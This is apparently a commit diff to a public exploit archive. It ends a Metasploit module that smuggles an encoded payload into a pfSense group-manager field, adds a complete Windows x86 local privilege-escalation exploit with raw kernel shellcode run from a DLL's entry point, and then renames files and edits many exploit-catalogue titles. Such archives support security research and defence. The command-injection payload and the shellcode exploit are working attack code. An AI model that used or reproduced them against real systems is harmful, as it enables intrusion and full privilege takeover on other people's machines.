'groupname' => group_name, + 'description' => '', + 'members[]' => "0';#{payload.encoded};'", + 'groupid' => '', + 'save' => 'Save' + } + if version >= Gem::Version.new('2.3') + post_vars = post_vars.merge('gtype' => 'local') + elsif version <= Gem::Version.new('2.3') # catch for 2.2.6. left this elsif for easy expansion to other versions as needed + post_vars = post_vars.merge( + 'act' => '', + 'gtype' => '', + 'privid' => '' + ) + end + send_request_cgi( + 'uri' => '/system_groupmanager.php', + 'method' => 'POST', + 'cookie' => cookie, + 'vars_post' => post_vars, + 'vars_get' => { + 'act' => 'edit' + } + ) + print_status("Manual removal of group #{group_name} is required.") + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end +end \ No newline at end of file diff --git a/exploits/win_x86/local/43192.c b/exploits/win_x86/local/43192.c new file mode 100644 index 000000000..f6946d839 --- /dev/null +++ b/exploits/win_x86/local/43192.c @@ -0,0 +1,68 @@ +/* + EDB Note + Source ~ https://gist.github.com/xpn/736daa4d1ff7b9869f4b3d1e9a34d315/ff2e2465d4a07588d0148dc87e77b17b41ef9d1d + Source ~ https://blog.xpnsec.com/windows-warbird-privesc/ + Source ~ https://github.com/xpn/warbird_exploit + Ref ~ https://bugs.chromium.org/p/project-zero/issues/detail?id=1391 +*/ + + // Shellcode to be executed by exploit + const char shellcode[256] = { + 0xc7, 0x43, 0x04, 0x00, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x0c, + 0x00, 0x00, 0x00, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x5f, + 0x5e, 0x5b, 0x89, 0xec, 0x5d, 0x81, 0xc4, 0x0c, 0x00, 0x00, + 0x00, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x5e, 0x5b, 0x5f, + 0x89, 0xec, 0x5d, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x81, + 0xc4, 0x04, 0x00, 0x00, 0x00, 0x5f, 0x5e, 0x5b, 0x89, 0xec, + 0x5d, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x04, + 0x00, 0x00, 0x00, 0x5f, 0x5f, 0x5e, 0x5b, 0x89, 0xec, 0x5d, + 0x60, 0x64, 0xa1, 0x24, 0x01, 0x00, 0x00, 0xc7, 0x80, 0x3e, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xe8, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xec, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xf0, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xf4, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xf8, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xfc, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x50, + 0x01, 0x00, 0x00, 0x81, 0xb8, 0x7c, 0x01, 0x00, 0x00, 0x63, + 0x6d, 0x64, 0x2e, 0x74, 0x0d, 0x8b, 0x80, 0xb8, 0x00, 0x00, + 0x00, 0x2d, 0xb8, 0x00, 0x00, 0x00, 0xeb, 0xe7, 0x89, 0xc3, + 0x81, 0xb8, 0xb4, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x74, 0x0d, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x2d, 0xb8, + 0x00, 0x00, 0x00, 0xeb, 0xe7, 0x8b, 0x88, 0xfc, 0x00, 0x00, + 0x00, 0x89, 0x8b, 0xfc, 0x00, 0x00, 0x00, 0x61, 0xc3, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff + }; + +void exploit(void) { + BYTE Buffer[8]; + DWORD BytesReturned; + + RtlZeroMemory(Buffer, sizeof(Buffer)); + NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)185, Buffer, sizeof(Buffer), &BytesReturned); + + // Copy our shellcode to the NULL page + RtlCopyMemory(NULL, shellcode, 256); + + RtlZeroMemory(Buffer, sizeof(Buffer)); + NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)185, Buffer, sizeof(Buffer), &BytesReturned); +} + +BOOL APIENTRY DllMain( HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + exploit(); + break; + } + return TRUE; +} \ No newline at end of file diff --git a/exploits/windows/remote/26497.c b/exploits/windows/local/26497.c similarity index 97% rename from exploits/windows/remote/26497.c rename to exploits/windows/local/26497.c index e1336bfce..9f9139b8f 100644 --- a/exploits/windows/remote/26497.c +++ b/exploits/windows/local/26497.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/15381/info RealNetworks RealPlayer and RealOne Player are reported prone to a remote stack-based buffer-overflow vulnerability. The applications fail to perform boundary checks when parsing RM (Real Media) files. A remote attacker may execute arbitrary code on a vulnerable computer to gain unauthorized access. This vulnerability is reported to occur in RealNetworks products for Microsoft Windows, Linux, and Apple Mac platforms. +*/ /* RealPlayer .smil file buffer overflow Coded by nolimit@CiSO & Buzzdee diff --git a/exploits/windows/remote/35714.pl b/exploits/windows/local/35714.pl similarity index 100% rename from exploits/windows/remote/35714.pl rename to exploits/windows/local/35714.pl diff --git a/exploits/windows/local/39102.py b/exploits/windows/remote/39102.py similarity index 100% rename from exploits/windows/local/39102.py rename to exploits/windows/remote/39102.py diff --git a/exploits/windows/local/40043.py b/exploits/windows/remote/40043.py similarity index 100% rename from exploits/windows/local/40043.py rename to exploits/windows/remote/40043.py diff --git a/files_exploits.csv b/files_exploits.csv index 6cbb0bc3b..b0c0c17a7 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -626,7 +626,7 @@ id,file,description,date,author,type,platform,port 4288,exploits/windows/dos/4288.c,"Wireshark < 0.99.6 - Mms Remote Denial of Service",2007-08-14,ZwelL,dos,windows, 4289,exploits/windows/dos/4289.php,"EFS Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,dos,windows, 4293,exploits/win_x86/dos/4293.php,"PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow",2007-08-18,boecke,dos,win_x86, -4294,exploits/windows/dos/4294.pl,"Mercury/32 Mail SMTPD - Unauthenticated Remote Stack Based Overrun (PoC)",2007-08-18,eliteboy,dos,windows, +4294,exploits/windows/dos/4294.pl,"Mercury/32 Mail SMTPD - Unauthenticated Remote Stack Overrun (PoC)",2007-08-18,eliteboy,dos,windows, 4297,exploits/hardware/dos/4297.pl,"Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service",2007-08-21,MADYNES,dos,hardware, 4298,exploits/hardware/dos/4298.pl,"Cisco IP Phone 7940 - 10 SIP Messages Remote Denial of Service",2007-08-21,MADYNES,dos,hardware, 4304,exploits/windows/dos/4304.php,"PHP 5.2.3 - PHP_ntuser ntuser_getuserlist() Local Buffer Overflow (PoC)",2007-08-23,shinnai,dos,windows, @@ -653,7 +653,7 @@ id,file,description,date,author,type,platform,port 4540,exploits/multiple/dos/4540.pl,"GCALDaemon 1.0-beta13 - Remote Denial of Service",2007-10-16,ikki,dos,multiple, 4559,exploits/multiple/dos/4559.txt,"Mozilla Firefox 2.0.0.7 - Remote Denial of Service",2007-10-22,BugReport.IR,dos,multiple, 4560,exploits/multiple/dos/4560.pl,"DNS Recursion Bandwidth Amplification - Denial of Service (PoC)",2007-10-23,ShadowHatesYou,dos,multiple, -4569,exploits/windows/dos/4569.pl,"CA BrightStor HSM r11.5 - Remote Stack Based Overflow / Denial of Service",2007-10-27,"Nice Name Crew",dos,windows, +4569,exploits/windows/dos/4569.pl,"CA BrightStor HSM r11.5 - Remote Stack Overflow / Denial of Service",2007-10-27,"Nice Name Crew",dos,windows, 4600,exploits/linux/dos/4600.py,"Firefly Media Server 0.2.4 - Remote Denial of Service",2007-11-02,nnp,dos,linux, 4601,exploits/multiple/dos/4601.txt,"Ubuntu 6.06 - DHCPd Remote Denial of Service",2007-11-02,RoMaNSoFt,dos,multiple, 4610,exploits/windows/dos/4610.html,"Viewpoint Media Player for IE 3.2 - Remote Stack Overflow (PoC)",2007-11-06,shinnai,dos,windows, @@ -709,7 +709,7 @@ id,file,description,date,author,type,platform,port 5229,exploits/multiple/dos/5229.txt,"asg-sentry 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",dos,multiple, 5235,exploits/windows/dos/5235.py,"MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Denial of Service",2008-03-11,ryujin,dos,windows, 5258,exploits/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - 'rpc.metad' Denial of Service (PoC)",2008-03-14,kingcope,dos,solaris, -5261,exploits/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",dos,windows, +5261,exploits/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",dos,windows, 5268,exploits/multiple/dos/5268.html,"Apple Safari (webkit) (iPhone/OSX/Windows) - Remote Denial of Service",2008-03-17,"Georgi Guninski",dos,multiple, 5270,exploits/windows/dos/5270.pl,"Home FTP Server 1.4.5 - Remote Denial of Service",2008-03-17,0in,dos,windows, 5306,exploits/multiple/dos/5306.txt,"Snircd 1.3.4 - 'send_user_mode' Denial of Service",2008-03-24,"Chris Porter",dos,multiple, @@ -1496,11 +1496,11 @@ id,file,description,date,author,type,platform,port 12206,exploits/windows/dos/12206.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetFileClose Overwrite (SEH) (PoC)",2010-04-13,s4squatch,dos,windows, 12207,exploits/windows/dos/12207.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetShareEnum Overwrite (SEH) (PoC)",2010-04-13,s4squatch,dos,windows, 12208,exploits/windows/dos/12208.html,"MagnetoSoft NetworkResources - ActiveX NetConnectionEnum Overwrite (SEH) (PoC)",2010-04-13,s4squatch,dos,windows, -12217,exploits/multiple/dos/12217.py,"Aircrack-NG Tools svn r1675 - Remote Heap-Based Buffer Overflow",2010-04-14,"Lukas Lueg",dos,multiple, +12217,exploits/multiple/dos/12217.py,"Aircrack-NG Tools svn r1675 - Remote Heap Buffer Overflow",2010-04-14,"Lukas Lueg",dos,multiple, 12228,exploits/windows/dos/12228.py,"MovieLibrary 1.4.401 - '.dmv' Local Denial of Service",2010-04-14,anonymous,dos,windows, 12229,exploits/windows/dos/12229.py,"Book Library 1.4.162 - '.bkd' Local Denial of Service",2010-04-14,anonymous,dos,windows, 12240,exploits/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow Denial of Service (PoC)",2010-04-14,mr_me,dos,windows, -15732,exploits/linux/dos/15732.txt,"FontForge - '.BDF' Font File Stack Based Buffer Overflow",2010-12-14,"Ulrik Persson",dos,linux, +15732,exploits/linux/dos/15732.txt,"FontForge - '.BDF' Font File Stack Buffer Overflow",2010-12-14,"Ulrik Persson",dos,linux, 12243,exploits/windows/dos/12243.py,"RPM Select/Elite 5.0 - '.xml Configuration parsing' Unicode Buffer Overflow (PoC)",2010-04-14,mr_me,dos,windows, 12252,exploits/hardware/dos/12252.txt,"IBM Bladecenter Management Module - Denial of Service",2010-04-15,"Alexey Sintsov",dos,hardware, 12258,exploits/windows/dos/12258.py,"Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006)",2010-04-16,"laurent gaffie",dos,windows, @@ -1814,7 +1814,7 @@ id,file,description,date,author,type,platform,port 15508,exploits/hardware/dos/15508.txt,"Camtron CMNC-200 IP Camera - Denial of Service",2010-11-13,"Trustwave's SpiderLabs",dos,hardware, 15514,exploits/windows/dos/15514.txt,"Foxit Reader 4.1.1 - Stack Overflow",2010-11-13,dookie,dos,windows, 15558,exploits/multiple/dos/15558.html,"Apple Safari 5.02 - Stack Overflow Denial of Service",2010-11-16,clshack,dos,multiple, -15580,exploits/windows/dos/15580.pl,"Native Instruments Traktor Pro 1.2.6 - Stack Based Buffer Overflow",2010-11-20,LiquidWorm,dos,windows, +15580,exploits/windows/dos/15580.pl,"Native Instruments Traktor Pro 1.2.6 - Stack Buffer Overflow",2010-11-20,LiquidWorm,dos,windows, 15581,exploits/windows/dos/15581.txt,"Native Instruments Reaktor 5 Player 5.5.1 - Heap Memory Corruption",2010-11-20,LiquidWorm,dos,windows, 15582,exploits/windows/dos/15582.pl,"Native Instruments Kontakt 4 Player - '.NKI' File Syntactic Analysis Buffer Overflow (PoC)",2010-11-20,LiquidWorm,dos,windows, 15583,exploits/windows/dos/15583.pl,"Native Instruments Massive 1.1.4 - KSD File Handling Use-After-Free",2010-11-20,LiquidWorm,dos,windows, @@ -1961,7 +1961,7 @@ id,file,description,date,author,type,platform,port 17164,exploits/windows/dos/17164.txt,"Microsoft Reader 2.1.1.3143 - Null Byte Write",2011-04-12,"Luigi Auriemma",dos,windows, 17188,exploits/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL - Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",dos,windows, 17201,exploits/multiple/dos/17201.php,"PHP 'phar' Extension 1.1.1 - Heap Overflow",2011-04-22,"Alexander Gavrun",dos,multiple, -17222,exploits/linux/dos/17222.c,"Libmodplug 0.8.8.2 - '.abc' Stack Based Buffer Overflow (PoC)",2011-04-28,epiphant,dos,linux, +17222,exploits/linux/dos/17222.c,"Libmodplug 0.8.8.2 - '.abc' Stack Buffer Overflow (PoC)",2011-04-28,epiphant,dos,linux, 17227,exploits/windows/dos/17227.py,"Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC) (MS11-02)",2011-04-29,webDEViL,dos,windows, 17266,exploits/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",dos,windows, 17278,exploits/windows/dos/17278.pl,"Adobe Audition 3.0 build 7283 - Session File Handling Buffer Overflow (PoC)",2011-05-13,LiquidWorm,dos,windows, @@ -1999,7 +1999,7 @@ id,file,description,date,author,type,platform,port 17567,exploits/osx/dos/17567.txt,"Apple Safari 5.0.6/5.1 - SVG DOM Processing (PoC)",2011-07-25,"Nikita Tarakanov",dos,osx, 17569,exploits/windows/dos/17569.py,"Ciscokits 1.0 - TFTP Server File Name Denial of Service",2011-07-25,"Craig Freyman",dos,windows, 17580,exploits/windows/dos/17580.py,"MyWebServer 1.0.3 - Denial of Service",2011-07-28,X-h4ck,dos,windows, -17582,exploits/windows/dos/17582.txt,"Citrix XenApp / XenDesktop - Stack Based Buffer Overflow",2011-07-28,"n.runs AG",dos,windows, +17582,exploits/windows/dos/17582.txt,"Citrix XenApp / XenDesktop - Stack Buffer Overflow",2011-07-28,"n.runs AG",dos,windows, 17583,exploits/windows/dos/17583.txt,"Citrix XenApp / XenDesktop XML Service - Heap Corruption",2011-07-28,"n.runs AG",dos,windows, 17601,exploits/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server - Denial of Service",2011-08-03,"Craig Freyman",dos,windows, 17610,exploits/multiple/dos/17610.py,"OpenSLP 1.2.1 / < 1647 trunk - Denial of Service",2011-08-05,"Nicolas Gregoire",dos,multiple, @@ -2060,7 +2060,7 @@ id,file,description,date,author,type,platform,port 17981,exploits/windows/dos/17981.py,"Microsoft Windows - TCP/IP Stack Denial of Service (MS11-064)",2011-10-15,"Byoungyoung Lee",dos,windows, 17982,exploits/windows/dos/17982.pl,"BlueZone Desktop - '.zap' file Local Denial of Service",2011-10-15,Silent_Dream,dos,windows, 18006,exploits/windows/dos/18006.html,"Opera 11.52 - Denial of Service (PoC)",2011-10-20,pigtail23,dos,windows, -18007,exploits/windows/dos/18007.txt,"Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflows",2011-10-20,rgod,dos,windows, +18007,exploits/windows/dos/18007.txt,"Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Buffer Overflows",2011-10-20,rgod,dos,windows, 18008,exploits/windows/dos/18008.html,"Opera 11.52 - Stack Overflow",2011-10-20,pigtail23,dos,windows, 18011,exploits/windows/dos/18011.txt,"UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow",2011-10-20,DiGMi,dos,windows, 18014,exploits/windows/dos/18014.html,"Opera 11.51 - Use-After-Free Crash (PoC)",2011-10-21,"Roberto Suggi Liverani",dos,windows, @@ -2075,7 +2075,7 @@ id,file,description,date,author,type,platform,port 18029,exploits/windows/dos/18029.pl,"BlueZone - '.zft' File Local Denial of Service",2011-10-24,"Iolo Morganwg",dos,windows, 18030,exploits/windows/dos/18030.pl,"BlueZone Desktop - Multiple Malformed Files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,dos,windows, 18049,exploits/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",dos,windows, -18052,exploits/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Based Buffer Overflow (PoC)",2011-10-31,rgod,dos,windows, +18052,exploits/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Buffer Overflow (PoC)",2011-10-31,rgod,dos,windows, 18078,exploits/windows/dos/18078.txt,"Microsoft Excel 2003 11.8335.8333 - Use-After-Free",2011-11-04,"Luigi Auriemma",dos,windows, 18106,exploits/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 - '.pdf' / '.WWF' File Handling Denial of Service",2011-11-11,LiquidWorm,dos,windows, 18107,exploits/windows/dos/18107.py,"Kool Media Converter 2.6.0 - Denial of Service",2011-11-11,swami,dos,windows, @@ -2223,7 +2223,7 @@ id,file,description,date,author,type,platform,port 18958,exploits/windows/dos/18958.html,"Sony VAIO Wireless Manager 4.0.0.0 - Buffer Overflow",2012-05-31,"High-Tech Bridge SA",dos,windows, 18962,exploits/windows/dos/18962.py,"Sorensoft Power Media 6.0 - Denial of Service",2012-05-31,Onying,dos,windows, 18964,exploits/windows/dos/18964.txt,"IrfanView 4.33 - Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",dos,windows, -18972,exploits/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",dos,windows, +18972,exploits/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Overflow",2012-06-02,"Francis Provencher",dos,windows, 19000,exploits/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service",2012-06-06,Onying,dos,windows, 19034,exploits/windows/dos/19034.cpp,"PEamp - '.mp3' Memory Corruption (PoC)",2012-06-10,Ayrbyte,dos,windows, 19046,exploits/aix/dos/19046.txt,"AppleShare IP Mail Server 5.0.3 - Buffer Overflow",1999-10-15,"Chris Wedgwood",dos,aix, @@ -2394,7 +2394,7 @@ id,file,description,date,author,type,platform,port 19940,exploits/windows/dos/19940.c,"Axent NetProwler 3.0 - IP Packets Denial of Service (1)",2000-05-18,"rain forest puppy",dos,windows, 19941,exploits/windows/dos/19941.casl,"Axent NetProwler 3.0 - IP Packets Denial of Service (2)",2000-05-18,"Pedro Quintanilha",dos,windows, 19950,exploits/linux/dos/19950.c,"XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver - Denial of Service",2000-05-18,"Chris Evans",dos,linux, -19961,exploits/windows/dos/19961.txt,"Oracle Outside-In - '.LWP' File Parsing Stack Based Buffer Overflow",2012-07-20,"Francis Provencher",dos,windows, +19961,exploits/windows/dos/19961.txt,"Oracle Outside-In - '.LWP' File Parsing Stack Buffer Overflow",2012-07-20,"Francis Provencher",dos,windows, 19962,exploits/windows/dos/19962.txt,"Oracle Outside-In JP2 - File Parsing Heap Overflow",2012-07-20,"Francis Provencher",dos,windows, 19974,exploits/windows/dos/19974.c,"Microsoft Windows Media Services 4.0/4.1 - Denial of Service (MS00-038)",2000-05-31,"Kit Knox",dos,windows, 19977,exploits/multiple/dos/19977.txt,"Real Networks Real Server 7.0/7.0.1/8.0 Beta - view-source Denial of Service",2000-06-01,"Ussr Labs",dos,multiple, @@ -2942,7 +2942,7 @@ id,file,description,date,author,type,platform,port 22920,exploits/unix/dos/22920.txt,"IBM U2 UniVerse 10.0.0.9 - UVADMSH Buffer Overflow",2003-07-16,kf,dos,unix, 22926,exploits/multiple/dos/22926.txt,"Witango Server 5.0.1.061 - Remote Cookie Buffer Overflow",2003-07-18,"Next Generation Software",dos,multiple, 22935,exploits/multiple/dos/22935.txt,"Websense Proxy - Filter Bypass",2012-11-26,"Nahuel Grisolia",dos,multiple, -22938,exploits/linux/dos/22938.py,"mcrypt 2.6.8 - Stack Based Buffer Overflow (PoC)",2012-11-26,_ishikawa,dos,linux, +22938,exploits/linux/dos/22938.py,"mcrypt 2.6.8 - Stack Buffer Overflow (PoC)",2012-11-26,_ishikawa,dos,linux, 22970,exploits/windows/dos/22970.txt,"NetScreen ScreenOS 4.0.1/4.0.3 - TCP Window Size Remote Denial of Service",2003-07-29,"Papa loves Mambo",dos,windows, 23003,exploits/windows/dos/23003.py,"UMPlayer Portable 0.95 - Crash (PoC)",2012-11-29,p3kok,dos,windows, 22978,exploits/hardware/dos/22978.txt,"Cisco IOS 10/11/12 - UDP Echo Service Memory Disclosure",2003-08-01,FX,dos,hardware, @@ -2960,8 +2960,8 @@ id,file,description,date,author,type,platform,port 23051,exploits/multiple/dos/23051.txt,"WapServ 1.0 - Denial of Service",2003-08-22,"Blue eyeguy4u",dos,multiple, 23053,exploits/windows/dos/23053.pl,"Vpop3d - Remote Denial of Service",2003-08-22,daniels@legend.co.uk,dos,windows, 23056,exploits/windows/dos/23056.c,"OptiSoft Blubster 2.5 - Remote Denial of Service",2003-08-25,"Luca Ercoli",dos,windows, -23075,exploits/linux/dos/23075.pl,"MySQL (Linux) - Stack Based Buffer Overrun (PoC)",2012-12-02,kingcope,dos,linux, -23076,exploits/linux/dos/23076.pl,"MySQL (Linux) - Heap Based Overrun (PoC)",2012-12-02,kingcope,dos,linux, +23075,exploits/linux/dos/23075.pl,"MySQL (Linux) - Stack Buffer Overrun (PoC)",2012-12-02,kingcope,dos,linux, +23076,exploits/linux/dos/23076.pl,"MySQL (Linux) - Heap Overrun (PoC)",2012-12-02,kingcope,dos,linux, 23078,exploits/linux/dos/23078.txt,"MySQL - Denial of Service (PoC)",2012-12-02,kingcope,dos,linux, 23086,exploits/windows/dos/23086.txt,"Yahoo! Messenger 4.0/5.0 - Remote Denial of Service",2003-09-01,diman,dos,windows, 23087,exploits/hardware/dos/23087.c,"Check Point Firewall-1 4.x - SecuRemote Internal Interface Address Information Leakage",2001-07-17,"Jim Becher",dos,hardware, @@ -3069,10 +3069,10 @@ id,file,description,date,author,type,platform,port 23540,exploits/freebsd/dos/23540.c,"KAME Racoon - 'Initial Contact' SA Deletion",2004-01-14,"Thomas Walpuski",dos,freebsd, 23543,exploits/multiple/dos/23543.txt,"Vicomsoft RapidCache Server 2.0/2.2.6 - Host Argument Denial of Service",2004-01-15,"Peter Winter-Smith",dos,multiple, 23556,exploits/multiple/dos/23556.txt,"GetWare Web Server Component - Content-Length Value Remote Denial of Service",2004-01-19,"Luigi Auriemma",dos,multiple, -23565,exploits/windows/dos/23565.txt,"Sony PC Companion 2.1 - 'DownloadURLToFile()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, -23567,exploits/windows/dos/23567.txt,"Sony PC Companion 2.1 - 'Load()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, -23568,exploits/windows/dos/23568.txt,"Sony PC Companion 2.1 - 'CheckCompatibility()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, -23569,exploits/windows/dos/23569.txt,"Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, +23565,exploits/windows/dos/23565.txt,"Sony PC Companion 2.1 - 'DownloadURLToFile()' Unicode Stack Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, +23567,exploits/windows/dos/23567.txt,"Sony PC Companion 2.1 - 'Load()' Unicode Stack Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, +23568,exploits/windows/dos/23568.txt,"Sony PC Companion 2.1 - 'CheckCompatibility()' Unicode Stack Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, +23569,exploits/windows/dos/23569.txt,"Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Unicode Stack Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, 23574,exploits/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 - Null Pointer Dereference",2012-12-21,"High-Tech Bridge SA",dos,windows, 23584,exploits/windows/dos/23584.c,"McAfee ePolicy Orchestrator 1.x/2.x/3.0 Agent - POST Buffer Mismanagement",2004-01-22,cyber_flash,dos,windows, 23590,exploits/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",dos,multiple, @@ -3163,7 +3163,7 @@ id,file,description,date,author,type,platform,port 24070,exploits/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPD 0.1B - Remote Heap Buffer Overflow",2004-04-30,"Slotto Corleone",dos,multiple, 24078,exploits/linux/dos/24078.c,"PaX 2.6 Kernel Patch - Denial of Service",2004-05-03,Shadowinteger,dos,linux, 24080,exploits/windows/dos/24080.pl,"Titan FTP Server 3.0 - 'LIST' Denial of Service",2004-05-04,storm,dos,windows, -24095,exploits/linux/dos/24095.txt,"DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Based Buffer Overflow",2004-05-06,"Joel Eriksson",dos,linux, +24095,exploits/linux/dos/24095.txt,"DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow",2004-05-06,"Joel Eriksson",dos,linux, 24096,exploits/linux/dos/24096.pl,"Qualcomm Eudora 5.2.1/6.x - Embedded Hyperlink Buffer Overrun",2004-05-07,"Paul Szabo",dos,linux, 24103,exploits/windows/dos/24103.txt,"MailEnable Mail Server HTTPMail 1.x - Remote Heap Overflow",2004-05-09,"Behrang Fouladi",dos,windows, 24107,exploits/windows/dos/24107.pl,"EMule Web 0.42 Control Panel - Denial of Service",2004-05-10,"Rafel Ivgi The-Insider",dos,windows, @@ -3211,7 +3211,7 @@ id,file,description,date,author,type,platform,port 24352,exploits/multiple/dos/24352.java,"Free Web Chat Initial Release - Connection Saturation Denial of Service",2004-08-04,"Donato Ferrante",dos,multiple, 24355,exploits/linux/dos/24355.txt,"GNU Info 4.7 - Follow XRef Buffer Overrun",2004-08-06,"Josh Martin",dos,linux, 24358,exploits/linux/dos/24358.txt,"Xine-Lib 0.99 - Remote Buffer Overflow",2004-07-08,c0ntex,dos,linux, -24360,exploits/linux/dos/24360.py,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (1)",2004-08-09,"Juan Pablo Martinez Kuhn",dos,linux, +24360,exploits/linux/dos/24360.py,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Buffer Overrun (1)",2004-08-09,"Juan Pablo Martinez Kuhn",dos,linux, 24362,exploits/windows/dos/24362.txt,"Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun",2004-08-11,"Paul Craig",dos,windows, 24386,exploits/multiple/dos/24386.txt,"British National Corpus SARA - Remote Buffer Overflow",2004-07-20,"Matthias Bethke",dos,multiple, 24388,exploits/multiple/dos/24388.txt,"aGSM 2.35 Half-Life Server - Info Response Buffer Overflow",2004-08-20,Dimetrius,dos,multiple, @@ -3272,7 +3272,7 @@ id,file,description,date,author,type,platform,port 24738,exploits/windows/dos/24738.c,"AlShare Software NetNote Server 2.2 - Remote Denial of Service",2004-11-13,class101,dos,windows, 24741,exploits/windows/dos/24741.txt,"TagScanner 5.1 - Stack Buffer Overflow",2013-03-13,Vulnerability-Lab,dos,windows, 24743,exploits/windows/dos/24743.txt,"Cam2pc 4.6.2 - '.BMP' Image Processing Integer Overflow",2013-03-13,coolkaveh,dos,windows, -24747,exploits/linux/dos/24747.c,"Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Based Buffer Overflow",2013-03-13,"Petr Matousek",dos,linux, +24747,exploits/linux/dos/24747.c,"Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Buffer Overflow",2013-03-13,"Petr Matousek",dos,linux, 24755,exploits/linux/dos/24755.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (1)",2004-11-19,"Marc Schoenefeld",dos,linux, 24756,exploits/linux/dos/24756.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (2)",2004-11-19,"Marc Schoenefeld",dos,linux, 24761,exploits/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x - Client Remote Denial of Service",2004-11-22,"Luigi Auriemma",dos,multiple, @@ -3311,7 +3311,7 @@ id,file,description,date,author,type,platform,port 27433,exploits/windows/dos/27433.txt,"Microsoft Internet Explorer 5.0.1 - Script Action Handler Buffer 